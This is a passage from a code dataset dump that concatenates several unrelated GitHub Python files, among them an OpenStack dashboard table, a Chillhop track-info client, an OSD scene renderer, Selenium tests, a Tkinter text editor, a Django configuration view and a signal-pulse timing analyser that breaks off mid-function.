status=True,\n status_choices=STATUS_CHOICES)\n stack_status = tables.Column(\"stack_status\",\n verbose_name=_(\"Status\"),\n display_choices=STACK_STATUS_DISPLAY_CHOICES)\n error_reason = tables.Column(\"error_reason\",\n verbose_name=_(\"Error Reason\"))\n\n class Meta(object):\n name = \"vnfmanager\"\n verbose_name = _(\"VNFManager\")\n status_columns = [\"status\", ]\n row_class = VNFUpdateRow\n table_actions = (DeployVNF, DeleteVNF, MyFilterAction,)\n","repo_name":"openstack/tacker-horizon","sub_path":"tacker_horizon/openstack_dashboard/dashboards/nfv/vnfmanager/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":9851,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"34"} +{"seq_id":"20498188150","text":"from datetime import datetime\nimport requests\nimport json\nimport time\n\nclass live:\n def __init__(self, stream_index=0, log_bad_response=False): # default value if no index is passed\n self.streams = [{'name': 'Chillhop Radio 🐾', 'id': '5yx6BWlEVcY', 'appid': '889847839662956615'}, {'name': 'lofi hip hop radio 🐾', 'id': '7NOSDKb0HlU', 'appid': '890420933280550922'}]\n self.stream_index = stream_index\n self.log_bad_response = log_bad_response # will remove this eventually\n\n def parse_response(self, response): # you can easily add variables to grab from the json here\n result = []\n \n for i in response: # iterates over a list of multiple tracks, useful for get_track_history()\n title = i[\"title\"] \n artists = []\n for artist in i[\"artists\"]:\n artists.append(artist[\"name\"])\n artists = ', '.join(artists)\n track_id = i[\"id\"]\n post_id = i[\"post_id\"]\n spotify_url = f\"https://spotify.com/track/{i['spot_id']}\"\n last_play = i[\"last_play\"]\n duration = i[\"duration\"]\n img = i[\"img\"]\n result.append({'title': title, 'artists': artists, 'track_id': track_id, 'post_id': post_id, 'spotify_url': spotify_url, 'last_play': last_play, 'duration': duration, 'img': img})\n\n return result\n\n def get_track_info(self):\n data = {'action': 'player_get_livestream_tracks', 'youtubeid': self.streams[self.stream_index]['id'], 'type': 'history', 'lastPull': (str(int(time.time()))), 'offset': '0'}\n\n while True:\n response = json.loads(requests.post('https://chillhop.com/wp-admin/admin-ajax.php', data=data).content)\n try: \n result = self.parse_response(response[\"livetracks\"])[0] # returned list should only contain one dict\n break\n except IndexError: # Chillhop's API sometimes returns nothing for a few seconds between songs - this handles that\n if self.log_bad_response == True:\n print(\"Encountered IndexError - waiting a bit...\")\n print('Response received:')\n print(response)\n time.sleep(4) # spam it until it works lol\n\n return result\n\n def get_track_history(self, offset):\n # -- WIP --\n # Chillhop's API returns information on the 20 last-played tracks at a time\n # Offset 0 will actually only return the currently playing track, but get_track_info() is provided as a more convenient function for this\n\n if offset < 0:\n raise ValueError(\"Offset passed to API cannot be negative\") # invalid offsets don't return anything useful\n data = {'action': 'player_get_livestream_tracks', 'youtubeid': self.streams[self.stream_index]['id'], 'type': 'history', 'lastPull': (str(int(time.time()))), 'offset': str(offset)}\n while True:\n response = json.loads(requests.post('https://chillhop.com/wp-admin/admin-ajax.php', data=data).content)\n try: \n result = self.parse_response(response[\"livetracks\"])\n break\n except IndexError:\n if self.log_bad_response == True:\n print(\"Encountered IndexError - waiting a bit...\")\n print(f\"Response received:\")\n print(response)\n time.sleep(4) # spam it until it works lol\n return result\n\n def get_current_views(self): # BUG: this request 404s even on Chillhop's website, maybe a change in the API?\n response = requests.get(f'https://chillhop.com/fetch3/?action=get_current_views&youtube_id={self.streams[self.stream_index][\"id\"]}')\n result = json.loads(response.content)[\"viewers\"]\n return result","repo_name":"dmgrstuff/chillhop-live-rpc","sub_path":"chillhop.py","file_name":"chillhop.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"34808328975","text":"# -*- coding:utf-8 -*-\r\n\r\nimport os\r\nimport shutil\r\nimport hexdump\r\nimport yaml\r\nimport struct\r\n\r\nfrom log import Log\r\nfrom imageutil import ImageUtil\r\nfrom font import Font\r\nfrom rectangle import Rectangle\r\nfrom palette import Palette\r\nfrom line import Line\r\nfrom window import Window\r\nfrom bitmap import Bitmap\r\nfrom glyph import Glyph\r\nfrom modifier import *\r\nfrom osdobject import OSDObjectType, OSDObject\r\n\r\nlogger = Log.get_logger(\"engine\")\r\n\r\n\r\nclass Scene(object):\r\n _BASE_DIR = None\r\n\r\n def __init__(self, yaml_file=None):\r\n self._yaml_file = None\r\n self._windows = []\r\n self._ingredients = {}\r\n self._palettes = {}\r\n self._modifiers = []\r\n self._width = -1\r\n self._height = -1\r\n self._frames = 1\r\n self._ticks = 20\r\n self.load(yaml_file)\r\n\r\n @property\r\n def filename(self):\r\n return self._yaml_file\r\n\r\n @property\r\n def width(self):\r\n return self._width\r\n\r\n @property\r\n def height(self):\r\n return self._height\r\n\r\n @property\r\n def frames(self):\r\n return self._frames\r\n\r\n @property\r\n def ticks(self):\r\n return self._ticks\r\n\r\n def find_palette(self, id):\r\n if id in self._palettes:\r\n return self._palettes[id]\r\n else:\r\n logger.warn('cannot find palette <%s>' % id)\r\n return None\r\n\r\n def find_ingredient(self, id):\r\n if id in self._ingredients:\r\n return self._ingredients[id]\r\n else:\r\n logger.warn('cannot find ingredient <%s>' % id)\r\n return None\r\n\r\n def find_window(self, id):\r\n for window in self._windows:\r\n if window.id == id:\r\n return window\r\n logger.warn('cannot find window <%s>' % id)\r\n return None\r\n\r\n def find_block(self, id):\r\n block = None\r\n ids = id.split('.')\r\n if len(ids) == 2:\r\n window = self.find_window(ids[0])\r\n if window is not None:\r\n block = window.find_block(ids[1])\r\n if block is None:\r\n logger.warn('cannot find block <%s>' % id)\r\n return block\r\n\r\n def load(self, yaml_file):\r\n if not os.path.isfile(yaml_file) or not os.access(yaml_file, os.R_OK):\r\n raise Exception('%s does not exist or cannot read' % yaml_file)\r\n\r\n self._yaml_file = os.path.abspath(yaml_file).replace('\\\\', '/')\r\n logger.debug('Loading OSD yaml file: <%s>' % self._yaml_file)\r\n\r\n Scene._BASE_DIR = os.path.dirname(self._yaml_file) + '/'\r\n\r\n logger.debug('BASE_DIR: <%s>' % Scene._BASE_DIR)\r\n\r\n ImageUtil.BASE_DIR = Scene._BASE_DIR\r\n Font.BASE_DIR = Scene._BASE_DIR\r\n\r\n self._yaml_file = yaml_file\r\n with open(self._yaml_file) as f:\r\n content = f.read()\r\n config = yaml.load(content)\r\n if config is None:\r\n raise Exception('cannot load yaml file %s' % self._yaml_file)\r\n\r\n config = config['OSD']\r\n assert (config is not None and\r\n config['width'] is not None and\r\n config['height'] is not None)\r\n self._width = config['width']\r\n self._height = config['height']\r\n self._frames = 1 if 'frames' not in config else int(config['frames'])\r\n\r\n logger.debug('Width:%d, Height:%d' % (self._width, self._height))\r\n\r\n for item in config['Palettes']:\r\n obj = self._create_object(item)\r\n self._palettes[obj.id] = obj\r\n\r\n for item in config['Ingredients']:\r\n obj = self._create_object(item)\r\n self._ingredients[obj.id] = obj\r\n\r\n for item in config['Windows']:\r\n obj = self._create_object(item)\r\n self._windows.append(obj)\r\n self.sort_windows()\r\n\r\n if 'Modifiers' in config:\r\n for item in config['Modifiers']:\r\n obj = self._create_object(item)\r\n self._modifiers.append(obj)\r\n\r\n def sort_windows(self):\r\n self._windows.sort(key=lambda window: window.zorder, reverse=False)\r\n\r\n def _create_object(self, item):\r\n assert (len(item.keys()) > 0)\r\n cls_name = list(item.keys())[0]\r\n values = item[cls_name]\r\n logger.debug('Construct Class \\'%s\\' by %s' % (cls_name, values))\r\n if cls_name not in globals():\r\n raise Exception('Undefined class <%s>' % cls_name)\r\n cls = globals()[cls_name]\r\n obj = cls(scene=self, **values)\r\n logger.debug(obj)\r\n return obj\r\n\r\n def modify(self):\r\n for modifier in self._modifiers:\r\n if modifier.active:\r\n modifier.run()\r\n\r\n def paint_line(self, y, line_buffer, painter):\r\n str_color = '{'\r\n for pixel in line_buffer:\r\n str_color = str_color + (\" #%06x\" % pixel)\r\n str_color = str_color + '}'\r\n painter.set_pixel(0, y, str_color)\r\n\r\n def merge_line(self, dst_buf, src_buf, src_buf_offset, src_alpha):\r\n \"\"\"\r\n blending源buffer到目的buffer中\r\n \"\"\"\r\n assert (src_buf_offset + len(src_buf) < self._width)\r\n for x in range(src_buf_offset, src_buf_offset + len(src_buf)):\r\n dst_buf[x] = ImageUtil.blend_pixel(dst_buf[x], src_buf[x - src_buf_offset], src_alpha)\r\n\r\n def _merge_line_buffers(self, window_line_buffers, width):\r\n line_buffer = [0] * width\r\n for window_line_buf in window_line_buffers:\r\n self.merge_line(line_buffer,\r\n window_line_buf.buffer,\r\n window_line_buf.start_x,\r\n window_line_buf.window.alpha)\r\n\r\n return line_buffer\r\n\r\n def draw(self, painter):\r\n for y in range(0, self._height):\r\n window_line_buffers = []\r\n for window in self._windows:\r\n if not window.visible:\r\n continue\r\n if window.y <= y < window.y + window.height:\r\n window_line_buffers.append(window.draw_line(y))\r\n line_buffer = self._merge_line_buffers(window_line_buffers, self._width)\r\n self.paint_line(y, line_buffer, painter)\r\n\r\n def __str__(self):\r\n str = 'Scene(%d x %d, %s)\\n' % (self._width, self._height, self._yaml_file)\r\n str += 'Palettes[%d]\\n' % len(self._palettes)\r\n for palette in self._palettes:\r\n str += '\\t%s\\n' % palette\r\n str += 'Ingredients[%d]\\n' % len(self._ingredients)\r\n for ingredient in self._ingredients:\r\n str += '\\t%s\\n' % ingredient\r\n return str\r\n\r\n def generate_binary(self, target_folder=None):\r\n \"\"\"\r\n struct object_binary{\r\n u16 object_type;\r\n u16 object_index;\r\n u32 object_size;\r\n u8 object_data[object_size];\r\n }\r\n \"\"\"\r\n assert self._yaml_file is not None\r\n if target_folder is None:\r\n path = os.path.splitext(self._yaml_file)\r\n target_folder = path[0] + '.generated'\r\n logger.debug('Target folder:%s' % target_folder)\r\n if os.path.exists(target_folder):\r\n shutil.rmtree(target_folder, ignore_errors=True)\r\n os.mkdir(target_folder)\r\n\r\n file_offset = 0\r\n global_data = []\r\n object_index = 0\r\n\r\n bin_filename = target_folder + \"/osd.bin\"\r\n bin_file = open(bin_filename, \"wb+\")\r\n objects_list = (self._palettes, self._ingredients, self._windows, self._modifiers)\r\n for objects in objects_list:\r\n items = objects if isinstance(objects, list) else objects.values()\r\n for item in items:\r\n item.object_id = OSDObject.make_object_id(item.type(), object_index)\r\n bins = item.to_binary()\r\n if len(bins) % 4 != 0:\r\n raise Exception('binary length of <%s> should 4 bytes align: %d' % (item.id, len(bins)))\r\n gen_bytes = struct.pack(' id<0x%x> type<%s> '\r\n 'bytes<0x%x> offset<0x%x>' % (\r\n item.id, item.object_id, item.type().name,\r\n len(gen_bytes), file_offset))\r\n logger.debug('\\n' + hexdump.hexdump(gen_bytes, result='return'))\r\n file_offset += len(gen_bytes)\r\n logger.debug('To_binary, TOTAL LENGTH <0x%x>', file_offset)\r\n with open(target_folder + '/global.yaml', 'w') as meta_file:\r\n yaml.dump(global_data,\r\n meta_file,\r\n default_flow_style=False,\r\n indent=4)\r\n bin_file.close()\r\n\r\n with open(bin_filename, 'rb') as f:\r\n logger.debug('\\n' + hexdump.hexdump(f.read(), result='return'))\r\n","repo_name":"fenixchen/MindMap","sub_path":"MOE/scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":9130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18763294129","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\nimport unittest\n\nclass ExplicitWaitTests(unittest.TestCase):\n def setUp(self):\n self.driver = webdriver.Chrome(executable_path=r'C:\\\\Selenium\\\\WebDriver\\\\Chrome\\\\chromedriver89_win32.exe')\n self.driver.get(\"http://demo.magentocommerce.com/\")\n\n def test_account_link(self):\n\n ## 1 : Implementing custom wait conditions\n WebDriverWait(self.driver, 10).until(lambda s: s.find_element_by_id(\"js-headerbutton\").get_attribute(\"href\") == \"https://magento.com/products/experience-magento?utm_source=m.com&utm_medium=website&utm_campaign=WW_200101_WBS_ACOM_ForgeDX_Overview_Demo\")\n\n ## 2\n careers = WebDriverWait(self.driver, 10).until(ec.visibility_of_element_located((By.LINK_TEXT, \"Careers\")))\n careers.click()\n\n ## Waiting for an element to be enabled\n def test_create_new_customer(self):\n # click on Log In link to open Login page\n account_icon_button = self.driver.find_element_by_class_name(\"account-icon\")\n account_icon_button.click()\n\n account_button = WebDriverWait(self.driver, 10).until(ec.visibility_of_element_located((By.LINK_TEXT, \"Create an account\")))\n account_button.click()\n\n def tearDown(self):\n self.driver.quit()\n\nif __name__ == \"__main__\":\n unittest.main(verbosity=2)","repo_name":"mercado-joshua/Selenium-Python__Scripts","sub_path":"Chapter-5/explicit wait/test_explicitwait.py","file_name":"test_explicitwait.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74239289058","text":"import os\nimport tkinter as tk\nfrom tkinter.filedialog import askopenfile\nfrom tkinter.filedialog import asksaveasfile\n\nclass TextEditor:\n def __init__(self):\n self.root = tk.Tk()\n\n # Variable to store state of opened file\n self.isOpened = False\n self.filename = ''\n\n # Setting the window size and title\n self.root.geometry('800x500')\n self.root.title('Text Editor')\n self.root.iconbitmap('./assets/icons/white_bg.ico')\n\n # Text editing area\n self.textbox = tk.Text(self.root, height=500, width=800, font=('Cairo', 12), foreground='White', background='Black')\n # Auto focus\n self.textbox.focus()\n # Cursor\n self.textbox.config(insertbackground='White', insertwidth=5)\n # Save using Ctrl + S\n self.textbox.bind('', self.shortcut)\n self.textbox.pack()\n\n # Menu\n self.main_menu = tk.Menu(self.root)\n self.main_menu.add_command(label='Open', command=self.open_file)\n self.main_menu.add_command(label='Save', command=self.save_file)\n self.root.config(menu=self.main_menu)\n\n self.root.mainloop()\n\n # This function will be used to open\n # file in read mode and only Text files\n # will be opened\n def open_file(self):\n file = askopenfile(mode ='r', filetypes =[('Text Files', '*.txt')])\n if file is not None:\n self.filename = file.name\n self.isOpened = True\n\n # Replace the current content with the content of the opened file\n content = file.read()\n self.textbox.delete('1.0', 'end')\n self.textbox.insert('insert', content)\n\n # Change the window title\n filename_without_ext = os.path.splitext(os.path.basename(self.filename))[0]\n self.root.title(filename_without_ext)\n \n # function to call when user press save button\n def save_file(self):\n # 'Save as'\n # This is done when creating a new file\n if self.isOpened == False:\n files = [('Text Document', '*.txt')]\n file = asksaveasfile(filetypes = files, defaultextension = files)\n if file is None:\n return\n self.filename = file.name\n self.isOpened = True\n # Save edit\n with open(self.filename, 'w') as f:\n f.write(self.textbox.get('1.0', tk.END))\n\n # function to handle keyboard shortcuts\n def shortcut(self, event):\n if (event.state == 12 and event.keysym == 's') or (event.state == 14 and event.keysym == 'S'):\n self.save_file()\n elif (event.state == 12 and event.keysym == 'o') or (event.state == 14 and event.keysym == 'O'):\n self.open_file()\n\n\n\nif __name__ == '__main__':\n app = TextEditor()","repo_name":"Mohabz-911/TextEditor","sub_path":"TextEditor.py","file_name":"TextEditor.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"36260727222","text":"from braces.views import GroupRequiredMixin\nfrom django.conf import settings\nfrom django.views.generic.base import TemplateView\nfrom django.shortcuts import redirect\nfrom django.contrib import messages\nfrom web_admin import api_settings, setup_logger\nfrom web_admin.restful_methods import RESTfulMethods\nfrom authentications.utils import get_correlation_id_from_username, check_permissions_by_user\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass ConfigurationListView(GroupRequiredMixin, TemplateView, RESTfulMethods):\n template_name = 'centralize_configuration/configuration_list.html'\n logger = logger\n\n group_required = \"SYS_CONFIGURE_SCOPE\"\n login_url = 'web:permission_denied'\n raise_exception = False\n\n def check_membership(self, permission):\n self.logger.info(\n \"Checking permission for [{}] username with [{}] permission\".format(self.request.user, permission))\n return check_permissions_by_user(self.request.user, permission[0])\n\n def dispatch(self, request, *args, **kwargs):\n correlation_id = get_correlation_id_from_username(self.request.user)\n self.logger = setup_logger(self.request, logger, correlation_id)\n return super(ConfigurationListView, self).dispatch(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n self.logger.info('========== Start getting all configuration scope ==========')\n context = super(ConfigurationListView, self).get_context_data(**kwargs)\n scope = context['scope']\n url = api_settings.CONFIGURATION_URL.format(scope=scope)\n data, success = self._get_method(url, 'configuration scope', logger)\n if success:\n is_permission_scope_attr = check_permissions_by_user(self.request.user, \"SYS_EDIT_SCOPE_ATTRIBUTE\")\n context[\"configurations\"] = data\n context[\"scope_name\"] = scope\n context[\"is_permission_scope_attr\"] = is_permission_scope_attr\n self.logger.info('========== Finish getting all configuration scope ==========')\n return context\n\n\nclass ConfigurationDetailsView(GroupRequiredMixin, TemplateView, RESTfulMethods):\n template_name = 'centralize_configuration/configuration_details.html'\n logger = logger\n\n group_required = \"SYS_EDIT_SCOPE_ATTRIBUTE\"\n login_url = 'web:permission_denied'\n raise_exception = False\n\n def check_membership(self, permission):\n self.logger.info(\n \"Checking permission for [{}] username with [{}] permission\".format(self.request.user, permission))\n return check_permissions_by_user(self.request.user, permission[0])\n\n def dispatch(self, request, *args, **kwargs):\n correlation_id = get_correlation_id_from_username(self.request.user)\n self.logger = setup_logger(self.request, logger, correlation_id)\n return super(ConfigurationDetailsView, self).dispatch(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n self.logger.info('========== Start getting configuration scope details ==========')\n context = super(ConfigurationDetailsView, self).get_context_data(**kwargs)\n scope = context['scope']\n conf_key = context['conf_key']\n url = api_settings.CONFIGURATION_DETAIL_URL.format(scope=scope, key=conf_key)\n\n data, success = self._get_method(url, 'configuration scope details', logger)\n if success:\n self.logger.info(\n '========== Finish getting configuration scope details ==========')\n context[\"configurations\"] = data\n context[\"scope_name\"] = scope\n context[\"user\"] = self.request.user\n return context\n\n def post(self, request, *args, **kwargs):\n self.logger.info('========== Start updating configuration scope ==========')\n scope = kwargs.get('scope', None)\n conf_key = kwargs.get('conf_key', None)\n conf_value = request.POST.get('conf_value')\n\n url = settings.DOMAIN_NAMES + api_settings.CONFIGURATION_UPDATE_URL.format(\n scope=scope, key=conf_key)\n params = {'value': conf_value}\n\n data, success = self._put_method(url, 'configuration scope', logger, params)\n if success:\n messages.add_message(\n request,\n messages.ERROR,\n 'Please restart service to get configuration effect.'\n )\n else:\n messages.add_message(\n request,\n messages.ERROR,\n data\n )\n self.logger.info('========== Finish updating configuration scope ==========')\n return redirect('centralize_configuration:configuration_list', scope=scope)\n","repo_name":"thol-voleak/ami-kh-devops_python","sub_path":"web_admin/centralize_configuration/views/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":4707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15020040769","text":"me = {\r\n \"name\": \"milad\",\r\n \"family\": \"golchinpour\",\r\n \"age\": 14,\r\n \"email\": \"miladgolchinpour85@gmail.com\"\r\n}\r\n\r\nisExistEmail = \"email\" in me\r\n\r\nprint(f\"Email : {isExistEmail}\")\r\n\r\nisExistAddress = \"addres\" in me\r\n\r\nprint(f\"Address : {isExistAddress}\")\r\n\r\nif \"email\" in me:\r\n print(\"True\")\r\nelse:\r\n print(\"False\")\r\n\r\nprint(\"----------------\")\r\n\r\nisExistMilad = \"milad\" in me.values()\r\n\r\nprint(isExistMilad)\r\n\r\n","repo_name":"MiladDeveloper-Hub/Python-Course-Begginer","sub_path":"Dict2.py","file_name":"Dict2.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1492402033","text":"import numpy as np\nfrom geometry import (\n euclidean_distance,\n to_spherical,\n to_rectangular,\n invert_heading,\n invert_pitch,\n degrees_to_radians,\n rotate_positions,\n)\nfrom utils import validate\n\n\ndef optimize_distances(positions, distances, origin, n, gain=0.001, decay=0.999999999999):\n print(\"\\nDistance optimization:\", n)\n prev_err = 1e5\n for i in range(n):\n gain = decay * gain\n avg_error = 0\n # Correct distances\n for ref in distances:\n x, y = ref\n Px, Py = positions[x], positions[y]\n dist = distances[ref]\n dist_estimated = euclidean_distance(Px, Py)\n direction = (Px - Py) / dist_estimated\n dist_error = dist_estimated - dist\n if x != origin:\n Px = Px - gain * (dist_error / 2) * direction\n if y != origin:\n Py = Py + gain * (dist_error / 2) * direction\n positions[x] = Px\n positions[y] = Py\n avg_error += abs(dist_error)\n # if i == n-1:\n # print(x, y, \"dist err\", abs(dist_error))\n # Log progress\n prog = ((i+1)/n)*100\n avg_dist_err = avg_error / len(distances)\n log = f\"\\rProgress {prog:.2f}% - Current error dist: {avg_dist_err:.5f}\"\n print(log, end=\"\", flush=True)\n if avg_dist_err < 1.0 and prev_err - avg_dist_err < 1e-20:\n print(f\"\\nEarly stopping at {prog:.2f}%.\", avg_dist_err)\n break\n prev_err = avg_dist_err\n print(\"\")\n return True\n\n\ndef optimize_angles(positions, distances, headings, pitches, origin, n):\n # First step: rotate to set one vector right\n aref = list(headings.keys())[0]\n a = positions[aref]\n b_r = to_spherical(a)[0]\n b_h = degrees_to_radians(invert_heading(headings[aref]))\n b_p = degrees_to_radians(invert_pitch(pitches[aref]))\n b = to_rectangular(np.array([b_r, b_h, b_p]))\n k = np.cross(a, b)\n k = k / np.linalg.norm(k)\n theta = np.arcsin(np.linalg.norm(np.cross(a, b)) / (np.linalg.norm(a) * np.linalg.norm(b)))\n rotate_positions(positions, k, theta, origin, in_place=True)\n dist_err, new_angle_err = validate(positions, distances, headings, pitches)\n assert np.isclose(b, positions[aref]).all()\n print(\"Initial flip. Dist err:\", dist_err, \" - Angle err:\", new_angle_err)\n\n # Second step: rotate around good vector to minimze error\n a = positions[aref]\n a = a / np.linalg.norm(a)\n best_angle_err = 10\n best_theta = None\n for i in range(n):\n theta = ((np.pi * 2) / n) * i\n new_positions = rotate_positions(positions, a, theta, origin)\n dist_err, new_angle_err = validate(new_positions, distances, headings, pitches)\n if new_angle_err < best_angle_err:\n best_angle_err = new_angle_err\n best_theta = theta\n # Log progress\n prog = ((i+1)/n)*100\n log = f\"\\rProgress {prog:.2f}% - Current error dist:{dist_err:.5f} - Current error angle:{best_angle_err:.5f}\"\n print(log, end=\"\", flush=True)\n rotate_positions(positions, a, best_theta, origin, in_place=True)\n\n\ndef get_coords(positions, data):\n pos = np.random.rand(3).astype(np.longdouble)\n gain = 0.5\n for i in range(1000):\n for key in data:\n if key not in positions:\n continue\n dist_estimated = euclidean_distance(pos, positions[key])\n direction = (pos - positions[key]) / dist_estimated\n dist_error = dist_estimated - data[key]\n pos = pos - gain * (dist_error / 2) * direction\n assert dist_error < 0.5\n return pos\n\n\ndef find_planet_centroid(n, surface_refs, positions):\n pos = np.random.rand(3).astype(np.longdouble)\n gain = 0.01\n for i in range(n):\n avg_error = list()\n if i == n - 1:\n print(\"\\n\")\n for ref_a in surface_refs:\n for ref_b in surface_refs:\n if ref_a == ref_b:\n continue\n dist_a = euclidean_distance(pos, positions[ref_a])\n direction_a = (pos - positions[ref_a]) / dist_a\n dist_b = euclidean_distance(pos, positions[ref_b])\n direction_b = (pos - positions[ref_b]) / dist_b\n error_a = dist_a - dist_b\n error_b = dist_b - dist_a\n pos = pos - gain * (error_a / 2) * direction_a\n pos = pos - gain * (error_b / 2) * direction_b\n avg_error.append(abs(dist_a - dist_b))\n if i == n-1:\n print(ref_a, ref_b, abs(dist_a - dist_b))\n if i == 0:\n print(\"Initial error:\", np.mean(avg_error), \"\\n\")\n # Log progress\n prog = ((i+1)/n)*100\n avg_error = np.mean(avg_error)\n log = f\"\\rProgress {prog:.2f}% - Current error dist:{avg_error:.5f}\"\n print(log, end=\"\", flush=True)\n print(\"\\n\")\n return pos\n \n \n","repo_name":"alansalinas/sc-system-navigation","sub_path":"optimize.py","file_name":"optimize.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12659810559","text":"# -*- coding: uTf-8 -*-\n\"\"\"\n@brief Analyzes various parameters of pulse signals.\n@details Analyzes various parameters of pulse signals.\n\"\"\"\nimport os\nimport pandas as pd\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\n\nclass Pulse():\n\n ##\n # @fn calc_time\n # @brief Calculate the rise time, fall time, and the time between HIGH of the pulse signal.[波形の各種時間(立上り、下がり、ONなど]を計算)\n # @param ts times array[時間データのnumpy配列]\n # @param ts amplitude array[立ち上がり開始時間]\n # @param ts times array[立ち上がり開始時間]\n # @param Ymax max of amplitude(default:None)[振幅の最大値]\n # @param Ymin min of amplitude(default:None)[振幅の最小値]\n # @param upper_threshold upper threshold of amplitude(default:0.9)[振幅の上限]\n # @param lower_threshold lower threshold of amplitude(default:0.1)[振幅の下限]\n # @param Tr_start_min Tr start min (default:None)[立ち上がり開始時間の最小値]\n # @param Tr_start Tr start (default:None)[立ち上がり開始時間]\n # @param Ton_min Ton min (default:None)[ONしている時間の最小値]\n # @retval dist[\"Ymax\"] max of amplitude[振幅の最大値]\n # @retval dist[\"Ymin\"] min of amplitude[振幅の最小値]\n # @retval dist[\"Yamp\"] amplitude[振幅]\n # @retval dist[\"upper\"] upper threshold of amplitude[振幅の上限]\n # @retval dist[\"lower\"] lower threshold of amplitude[振幅の下限]\n # @retval dist[\"Tr_start\"] Start of rise time[立ち上がり開始時間]\n # @retval dist[\"Tr_end\"] End of rise time[立ち上がり終了時間]\n # @retval dist[\"Tr\"] rise time[立ち上がり時間]\n # @retval dist[\"Tf_start\"] Start of rise time[立ち下がり開始時間]\n # @retval dist[\"Tf_end\"] Start of rise time[立ち下がり終了時間]\n # @retval dist[\"Ton\"] on time[ON中の時間]\n # @retval dist[\"Tf\"] fall time[立ち下がり時間]\n # @retval dist[\"Tau\"] Time constant[時定数]\n def calc_time(self, ts, ys, Ymax=None, Ymin=None, upper_threshold=0.9, lower_threshold=0.1, Tr_start_min=None, Tr_start=None, Ton_min=None):\n\n dst = {}\n\n # 最小時間が指定されていなければ、最も小さい時間をセット\n if Tr_start_min == None:\n Tr_start_min = ts.min()\n\n # 最小時間が指定されていなければ、最も小さい時間をセット\n if Ton_min == None:\n Ton_min = 0\n\n if Ymax == None:\n Ymax = ys.max()\n\n if Ymin == None:\n Ymin = ys.min()\n\n dst[\"Ymax\"] = Ymax\n dst[\"Ymin\"] = Ymin\n dst[\"Yamp\"] = Yamp = Ymax - Ymin\n\n dst[\"upper\"] = upper_threshold\n dst[\"lower\"] = lower_threshold\n\n # 立上り開始時間(信号がしきい値と最小値を超えた直後の時間)を取得\n if Tr_start == None:\n Trs_start = ts[ys > Yamp * lower_threshold]\n dst[\"Tr_start\"] = Tr_start = Trs_start[Trs_start > Tr_start_min].min()\n # 立上り開始時間が指定されているときは、指定値をセット\n else:\n dst[\"Tr_start\"] = Tr_start\n\n # 立上り終了時間を取得\n Trs_end = ts[ys > Yamp * upper_threshold]\n dst[\"Tr_end\"] = Tr_end = Trs_end[Trs_end > Tr_start].min()\n\n # 立上り時間を計算\n dst[\"Tr\"] = Tr = Tr_end - Tr_start\n\n # 立下り開始時間を取得( > 立上り終了時間 + ON最小時間)\n try:\n Tfs_start = ts[ys < Yamp * upper_threshold]\n dst[\"Tf_start\"] = Tf_start = Tfs_start[Tfs_start >\n Tr_end + Ton_min].min()\n except:\n dst[\"Tf_start\"] = Tf_start = ts[-1]\n\n # 立下り終了時間を取得\n try:\n Tfs_end = ts[ys < Yamp * 0.1]\n dst[\"Tf_end\"] = Tf_end = Tfs_end[Tfs_end > Tf_start].min()\n except:\n dst[\"Tf_end\"] = Tf_end = ts[-1]\n\n if math.isnan(Tf_start):\n dst[\"Tf_start\"] = Tf_start = ts[-1]\n\n if math.isnan(Tf_end):\n dst[\"Tf_end\"] = Tf_end = ts[-1]\n\n # ONの時間を計算(立上り終了時間~立下り開始時間)\n dst[\"Ton\"] = Ton = Tf_start - Tr_end\n\n # 立下り時間を計算\n dst[\"Tf\"] = Tf = Tf_end - Tf_start\n\n # 時定数を計算\n Taus = ts[ys >= Yamp * 0.632]\n dst[\"Tau\"] = Tau = Taus[Taus > Tr_start_min].min() - Tr_start\n self.pulse_times = dst\n\n return dst\n\n ##\n # @fn show_time\n # @brief Show the rise time, fall time, and the time between HIGH of the pulse signal.[波形の各種時間(立上り、下がり、ONなど]を表示)\n def show_time(self):\n dst = {}\n Tr_start = self.pulse_times[\"Tr_start\"]\n Tr_end = self.pulse_times[\"Tr_end\"]\n Tr = self.pulse_times[\"Tr\"]\n Ton = self.pulse_times[\"Ton\"]\n Tf_start = self.pulse_times[\"Tf_start\"]\n Tf_end = self.pulse_times[\"Tf_end\"]\n Tf = self.pulse_times[\"Tf\"]\n Tau = self.pulse_times[\"Tau\"]\n Ymax = self.pulse_times[\"Ymax\"]\n Ymin = self.pulse_times[\"Ymin\"]\n Yamp = self.pulse_times[\"Yamp\"]\n\n print(\"Tr start:\", Tr_start)\n print(\"Tr end:\", Tr_end)\n print(\"Tr:\", Tr)\n print(\"Ton:\", Ton)\n print(\"Tf start:\", Tf_start)\n print(\"Tr end:\", Tf_end)\n print(\"Tf:\", Tf)\n print(\"Tau:\", Tau)\n\n def save_graph(self, x, y, xlabel, ylabel, save_path, label_name=\"Y\"):\n Tr_start = self.pulse_times[\"Tr_start\"]\n Tr_end = self.pulse_times[\"Tr_end\"]\n Tr = self.pulse_times[\"Tr\"]\n Ton = self.pulse_times[\"Ton\"]\n Tf_start = self.pulse_times[\"Tf_start\"]\n Tf_end = 